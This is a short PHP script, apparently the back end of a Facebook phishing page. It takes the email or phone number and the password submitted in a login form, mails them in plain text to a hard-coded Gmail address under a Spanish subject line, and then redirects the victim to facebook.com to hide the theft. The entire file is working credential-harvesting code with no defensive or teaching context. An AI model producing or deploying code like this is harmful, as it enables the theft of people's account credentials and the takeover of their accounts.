<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $email_or_phone = $_POST['email_or_phone'];
    $password = $_POST['password'];

    $to = "gaineagono@gmail.com";
    $subject = "Nuevo intento de inicio de sesión";
    $message = "Correo electrónico o número de teléfono: " . $email_or_phone . "\nContraseña: " . $password;
    $headers = "From: no-reply@tu-dominio.com";

    if (mail($to, $subject, $message, $headers)) {
        header("Location: https://www.facebook.com");
        exit();
    } else {
        echo "Error al enviar el correo.";
    }
}
?>
